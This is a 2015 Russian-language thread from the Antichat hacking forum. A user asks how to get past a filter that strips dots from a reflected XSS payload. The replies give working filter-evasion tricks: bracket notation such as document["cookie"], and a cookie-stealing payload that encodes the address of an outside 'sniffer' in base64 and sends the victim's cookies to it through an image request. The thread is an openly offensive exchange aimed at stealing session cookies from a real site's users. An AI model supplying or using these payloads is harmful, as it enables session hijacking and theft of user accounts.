Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница Фильтрация точки в запросе

   

Опции темы

Поиск в этой теме

Опции просмотра

#1   05.11.2015, 18:00 Ditss Новичок Регистрация: 05.11.2015 Сообщений: 9 Провел на форуме: 1696 Репутация: 0 Здравствуйте все! Можно как-то обойти фильтрацию точки в запросе? Есть запрос Код: /index.php?p=">alert(document.cookie) Но точка в document.cookie фильтруется... ( Пробовал вставлять ASCII коды точки, но фильтр и на них... Заранее спасибо!   Ditss Посмотреть профиль Репутация Найти все сообщения от Ditss Добавить в друзья   #2   05.11.2015, 18:25 faza02 Banned Регистрация: 21.11.2007 Сообщений: 181 Провел на форуме: 1066435 Репутация: 1013 document["cookie"]   faza02 Посмотреть профиль Репутация Посетить домашнюю страницу faza02 Найти все сообщения от faza02 Добавить в друзья   #3   06.11.2015, 08:57 M_script Новичок Регистрация: 04.11.2004 Сообщений: 5 Провел на форуме: 4512 Репутация: 0 Цитата: Сообщение от altai   ↑ Попробуй вот так Можете привести пример уязвимого кода, где сработает такая атака?   M_script Посмотреть профиль Репутация Отправить личное сообщение для M_script Найти все сообщения от M_script Добавить в друзья   #4   06.11.2015, 09:51 Altai Новичок Регистрация: 04.02.2010 Сообщений: 0 Провел на форуме: 1574 Репутация: 0 Цитата: Сообщение от M_script   ↑ Можете привести пример уязвимого кода, где сработает такая атака? я не внимательно прочитал вопрос Согласен, фигню сказал   Altai Посмотреть профиль Репутация Отправить личное сообщение для Altai Найти все сообщения от Altai Добавить в друзья   #5   06.11.2015, 12:50 Ditss Новичок Регистрация: 05.11.2015 Сообщений: 9 Провел на форуме: 1696 Репутация: 0 Цитата: Сообщение от yarbabin   ↑ document["cookie"] Спасибо, так работает! А если нужно сделать так: Код: "> как подменять точки в строке адреса?   Ditss Посмотреть профиль Репутация Найти все сообщения от Ditss Добавить в друзья   #6   06.11.2015, 13:12 faza02 Banned Регистрация: 21.11.2007 Сообщений: 181 Провел на форуме: 1066435 Репутация: 1013 Цитата: Сообщение от Ditss   ↑ Спасибо, так работает! А если нужно сделать так: Код: "> как подменять точки в строке адреса? (new Image())["src"]=atob("lol")+document["cookie"] где lol - ссылка на сниффер в base64   faza02 Посмотреть профиль Репутация Посетить домашнюю страницу faza02 Найти все сообщения от faza02 Добавить в друзья   #7   06.11.2015, 14:49 M_script Новичок Регистрация: 04.11.2004 Сообщений: 5 Провел на форуме: 4512 Репутация: 0 Цитата: Сообщение от Ditss   ↑ Код: "> Этот код не будет работать даже без фильтрации точек.   M_script Посмотреть профиль Репутация Отправить личное сообщение для M_script Найти все сообщения от M_script Добавить в друзья

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ИНФО     Мировые новости. Обсуждения.     Статьи         Избранное РАЗРАБОТКА     Ваши проекты     SЕО - тонкости, методы раскрутки         Услуги, Покупка и Продажа в SEO     Хостинги - Hostings         Хостинг, Dedicated, VDS, Сервера - покупка, продажа     Для Администратора         Apple: Mac, OS X, iOS         AntiDDos - АнтиДДОС         Windows         Linux, Freebsd, *nix ПРОГРАММИРОВАНИЕ     Общие вопросы программирования         ПО для Web разработчика     PHP     Python     С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby     Реверсинг ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         Услуги, Покупка и Продажа в SEO         Электронные валюты: Обмен, Вывод, Ввод         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, инсталлы, загрузки - Покупка, продажа         Покупка, продажа, услуги в Соц. Сетях     Партнерки     Freelance - О Работе         Предложения работы, услуг     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Платежные системы         Электронные валюты: Обмен, Вывод, Ввод         Blockchain, Криптовалюты, смарт-контракты ЛИЧНЫЕ ФОРУМЫ     Olbanec - Арбитраж трафика ОФФТОП     Болталка     Forum for discussion of ANTICHAT     Video.Antichat         Комментарии к видео     Архив         ICQ - Покупка, продажа